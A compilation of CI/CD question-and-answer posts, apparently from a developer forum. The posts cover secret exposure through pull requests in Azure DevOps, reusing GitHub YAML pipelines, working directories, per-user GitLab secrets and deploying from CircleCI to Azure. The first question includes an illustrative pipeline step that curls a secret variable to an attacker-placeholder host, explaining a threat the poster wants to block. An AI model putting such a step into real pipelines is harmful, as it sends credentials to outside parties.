We have an open source project on GitHub, and we use Azure DevOps Pipelines for our CI.
We publish our artefacts to S3 and Maven after successful tests, so all the credentials are stored as secret variables.
It's nice that export and echo $top_secret are conveniently obfuscated with ***, but unfortunately literally any GitHub user can create a pull request against our repo and, as part of the changes, edit our azure-pipelines.yml to call curl (or similar) that reads the credentials from environment variables and sends them to their own server.
In other CI providers (e.g., Travis CI), secret variables are not accessible from PR branches.
How can I prevent PRs from touching my CI configuration file and do anything with it?
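For illustration, a minimal sketch of the kind of edit such a PR could make to azure-pipelines.yml (the variable name and URL are made up):

steps:
  - script: |
      # illustrative only: send the secret to an attacker-controlled server
      curl -X POST --data "$TOP_SECRET" https://attacker.example.com
    env:
      TOP_SECRET: $(top_secret)   # maps a hypothetical secret variable into the script's environment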
Your CI configuration file is saved in the open source GitHub repo and you want to restrict users from changing this file, right? Since we cannot set file permissions in GitHub, we cannot prevent PRs from touching your CI configuration file.
As a workaround, we could create a classic editor pipeline in Azure DevOps and set the CI trigger there. If users do not have permission to change the build definition, they cannot change your CI build definition.
I want to create Azure DevOps pipelines, but instead of writing new YAML files, use prepared ones that are already in a GitHub repository.
I have connected GitHub to my Azure DevOps account, but I can't see an option to use the YAML files in that repository.
I only have the option to create a new pipeline YAML and then place it in the repo folder structure.
If I try to place it at the location of the YAML file I want to use, which is already in the repo, I get, of course, an error stating there's already a file there.
My workaround is to create a new YAML file with a different name, copy the content from the existing file, then delete that one and rename the new file to the name of the file I copied from.
Surely there must be a better, easier, more logical and shorter way.
I would appreciate any help.
Under Project Settings you should link your GitHub account.
Then you can go and create a new pipeline and select GitHub as the location.
After this step, your available GitHub repositories will appear and you can select your existing .yml file.
I'm new to Azure DevOps, and I was wondering if there was a way to automatically detect a .yml build file and create a pipeline without having to interact with the site.
I have tried creating a file called azure-pipelines.yml in the root of the repo, with no luck.
Is there any way to automatically create pipelines? Like how Jenkins detects a Jenkinsfile?
No, this is not possible out of the box, because a YAML file is not always a pipeline definition. You may try to figure out whether it truly is, but you would need to listen for repo changes, and in fact you can do this via another pipeline ;) for instance like this:
check if the commit has a new YAML file added
verify that the file is a pipeline definition
create a pipeline using the Azure CLI, for instance (see the sketch below)
However, this would be quite a lot of work, and you would then need to create such a pipeline in every repo where you want this detection enabled.
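A minimal sketch of that last step as a step in the "watcher" pipeline, assuming the Azure DevOps CLI extension (az devops / az pipelines) is available on the agent; organization, project, repo, branch, path, and secret names are placeholders:

steps:
  - script: |
      # placeholder names throughout; repository-type is github or tfsgit
      # depending on where the detected YAML file lives
      az pipelines create \
        --organization https://dev.azure.com/MyOrg \
        --project MyProject \
        --name auto-detected-pipeline \
        --repository MyRepo \
        --repository-type tfsgit \
        --branch main \
        --yml-path path/to/new-pipeline.yml \
        --skip-first-run
    env:
      AZURE_DEVOPS_EXT_PAT: $(devops_pat)   # hypothetical PAT secret used by az devops for auth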
I have created a Pipeline in Azure DevOps and have associated a git repository.
It is cloned to my agent, but I can't control which local directory the repository is cloned into. I am working with a self-hosted agent.
The next task needs to use a specific file in the repository to complete the task.
The last thing that should happen in the pipeline is pushing back the changes made in the repository.
I think what you want is the working directory ($(System.DefaultWorkingDirectory)), the local path on the agent where your source code files are downloaded. For example: c:\agent\_work\1\s
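If you also need to control where the clone lands and push changes back at the end, a rough sketch using the checkout step's path input (the repo path, file name, and commit identity are assumptions, not from the question):

steps:
  - checkout: self
    path: my-repo                      # cloned to $(Agent.BuildDirectory)/my-repo
    persistCredentials: true           # keep the access token so a later step can git push
  - script: cat some-config.txt        # hypothetical file the next task needs
    workingDirectory: $(Agent.BuildDirectory)/my-repo
  - script: |
      git config user.email "pipeline@example.com"   # placeholder identity for the commit
      git config user.name "Azure Pipeline"
      git add -A
      git commit -m "Update from pipeline" || echo "nothing to commit"
      # the project's build service account needs Contribute permission on the repo
      git push origin HEAD:$(Build.SourceBranchName)
    workingDirectory: $(Agent.BuildDirectory)/my-repo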
We have a GitLab project with multiple developers, and the repo itself is a Conan project.
When a release tag is created, I want to set up a pipeline which builds the Conan package and then uploads it to Artifactory. Uploading to Artifactory requires a username and password login. This is similar to many other deployment jobs where user+pass authentication is required.
I already found a solution that defines secret variables for the project (project level) and uses a single account for the whole project to upload to Artifactory. This is an issue security-wise, as we want to know who uploaded the Conan package, i.e., which user.
Is it somehow in Gitlab possible to define secrets on the user level?
I.e., if User1 creates the tag and has his own Artifactory account user+pass secrets set up, the pipeline successfully pushes the Conan package.
If now User2 creates a tag but did not setup secrets, the push should fail.
The following Gitlab issue is a similar description of the problem, but does not contain any solution:
https://gitlab.com/gitlab-org/gitlab/-/issues/15815
Also related: gitlab credentials for specific user (but handles a shared secret with specific user access).
CI secrets are currently only project level, but you might be able to do something similar with one of the predefined environment variables. There are four variables that hold info about the GitLab user who started the pipeline (whether by trigger, schedule, push, etc.): $GITLAB_USER_EMAIL, $GITLAB_USER_ID, $GITLAB_USER_LOGIN, and $GITLAB_USER_NAME. Then, in your project's secret variables, you can store credentials for each of your users and, in your job, grab the correct one based on the USER variables.
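A minimal .gitlab-ci.yml sketch of that idea, assuming project-level variables named like ARTIFACTORY_PASS_<login>, a bash-based runner shell (for the indirect expansion), and Conan 2.x commands; the remote URL and package names are placeholders:

upload_package:
  stage: deploy
  rules:
    - if: $CI_COMMIT_TAG               # only run for release tags
  script:
    # look up the tag creator's credentials, e.g. ARTIFACTORY_PASS_user1
    - PASS_VAR="ARTIFACTORY_PASS_${GITLAB_USER_LOGIN}"
    - ARTIFACTORY_PASS="${!PASS_VAR}"
    - |
      if [ -z "$ARTIFACTORY_PASS" ]; then
        echo "No Artifactory credentials configured for $GITLAB_USER_LOGIN"
        exit 1
      fi
    - conan remote add artifactory https://artifactory.example.com/artifactory/api/conan/conan-local
    - conan remote login artifactory "$GITLAB_USER_LOGIN" -p "$ARTIFACTORY_PASS"
    - conan create .
    - conan upload "mypkg/*" -r artifactory --confirm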
I'm using CircleCI for the first time and having trouble publishing to Azure.
The docs don't have an example for Azure, they have an example for AWS and a note for Azure saying "To deploy to Azure, use a similar job to the above example that uses an appropriate command."
If anybody has an example YAML file, that would be great; if not, a nudge in the right direction would be handy. So far I think I've worked out the following:
I need a config that will install the Azure CLI
I need to put my Azure deployment credentials in an environment variable and
I need to run a deploy command in the YAML file to zip up all the right files and deploy to my Azure app service.
I have no idea if the above is correct, or how to do it, but that's my understanding right now.
I've also posted this on the CircleCI forum.
EDIT: Just to add a little more info, the AWS version of the config file used the following command:
- run:
    name: Deploy to S3
    command: aws s3 sync jekyll/_site/docs s3://circle-production-static-site/docs/ --delete
So I guess I'm looking for the Azure equivalent.
The easiest way is to set up deployment from source control in the Azure management console; you can follow these two links:
https://medium.com/@strid/automatic-deploy-to-azure-web-app-with-circle-ci-v2-0-1e4bda0626e5
https://www.bradleyportnoy.com/how-to-set-up-continuous-deployment-to-azure-from-circle-ci/
If you want to copy the files yourself from CI to the IIS server or Azure, you will need SSH access (keys, etc.), and in the deployment section of circle.yml you can have something like this:
deployment:
  production:
    branch: master
    commands:
      - scp -r circle-pushing/* username@my-server:/path-to-put-files-on-server/
“circle-pushing” is your repo name, which is whatever it’s called in GitHub or Bitbucket, and the rest is the hostname and filepath of the server you want to upload files to.
This could also help you understand it better:
https://learn.microsoft.com/en-us/azure/virtual-machines/linux/copy-files-to-linux-vm-using-scp
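If you would rather deploy from the CircleCI job itself (the Azure equivalent of the aws s3 sync step above), a rough CircleCI 2.0 sketch might look like this; the service-principal variables, resource group, app name, and paths are placeholders, not values from the question:

version: 2
jobs:
  deploy:
    docker:
      - image: cimg/base:stable        # Ubuntu-based convenience image with git, curl, sudo
    steps:
      - checkout
      - run:
          name: Install Azure CLI and zip
          command: |
            curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
            sudo apt-get update && sudo apt-get install -y zip
      - run:
          name: Deploy to Azure App Service
          command: |
            # AZURE_SP_* are assumed to be set as CircleCI project environment variables
            az login --service-principal -u "$AZURE_SP_APP_ID" \
              -p "$AZURE_SP_PASSWORD" --tenant "$AZURE_SP_TENANT"
            zip -r site.zip jekyll/_site/docs
            az webapp deployment source config-zip \
              --resource-group my-resource-group \
              --name my-app-service \
              --src site.zip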